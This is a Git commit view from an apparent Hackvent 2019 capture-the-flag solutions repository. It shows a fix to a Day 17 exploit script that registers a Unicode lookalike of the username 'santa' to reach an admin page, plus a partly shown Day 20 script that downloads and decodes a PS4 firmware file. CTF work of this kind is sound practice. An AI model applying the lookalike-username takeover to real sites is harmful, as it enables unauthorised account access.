Roman/Hackvent_2019
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Day 20 + 17 fix

Browse Source
This commit is contained in:
Roman Hergenreder 2019-12-29 18:40:38 +01:00
parent a9efab946d
commit 45862b6590
3 changed files with 33 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Day 17/exploit.py
View File

@ -13,21 +13,21 @@ FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
# 1. register user santa
res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
if res.status_code != 200 or "Registration successful!" not in res.text:
print("Server returned: %d %s" % (res.status_code, res.status_text))
print("Server returned: %d %s" % (res.status_code, res.reason))
print(res.text)
exit(1)
# 2. login
res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
if res.status_code != 200 or "username not found or wrong password!" in res.text:
print("Server returned: %d %s" % (res.status_code, res.status_text))
print("Server returned: %d %s" % (res.status_code, res.reason))
print(res.text)
exit(1)
# 3. get flag
res = SESSION.get(BASE_URL + "/admin.php")
if res.status_code != 200 or "username not found or wrong password!" in res.text:
print("Server returned: %d %s" % (res.status_code, res.status_text))
print("Server returned: %d %s" % (res.status_code, res.reason))
exit(1)
print(FLAG_PATTERN.search(res.text))

1
Day 20/.gitignore vendored Normal file
View File

@ -0,0 +1 @@
PS4UPDATE\.PUP

31
Day 20/decode.py
View File

@ -1,9 +1,36 @@
#!/usr/bin/python
byte_300 = [0xCE, 0x55, 0x95, 0x4E, 0x38, 0x0C5, 0x89, 0x0A5, 0x1B, 0x6F, 0x5E, 0x25, 0x0D2, 0x1D, 0x2A, 0x2B, 0x5E, 0x7B, 0x39, 0x14, 0x8E, 0x0D0, 0x0F0, 0x0F8, 0x0F8, 0x0A5]
import requests
import hashlib
import os
byte_300 = [0xCE, 0x55, 0x95, 0x4E, 0x38, 0x0C5, 0x89, 0x0A5, 0x1B, 0x6F, 0x5E, 0x25, 0x0D2, \
0x1D, 0x2A, 0x2B, 0x5E, 0x7B, 0x39, 0x14, 0x8E, 0x0D0, 0x0F0, 0x0F8, 0x0F8, 0x0A5]
EXPECTED_HASH = "f86d4f9d2c049547bd61f942151ffb55"
INPUT_FILE = "PS4UPDATE.PUP"
BUFFER_LENGTH = len(byte_300)
with open("PS4UPDATE.PUP", "rb") as f:
def downloadFile():
print("Downloading file…")
res = requests.get("https://psarchive.darksoftware.xyz/505Retail.PUP")
if res.status_code != 200:
print("Server returned: %d %s" % (res.status_code, res.reason))
exit(1)
buffer = res.content
hash = hashlib.md5(buffer).hexdigest()
if hash != EXPECTED_HASH:
print("Hash does not match:", hash)
exit(1)
with open(INPUT_FILE, "wb") as f:
f.write(buffer)
if not os.path.isfile(INPUT_FILE):
downloadFile()
with open(INPUT_FILE, "rb") as f:
v29 = byte_300.copy()
v14 = 4919;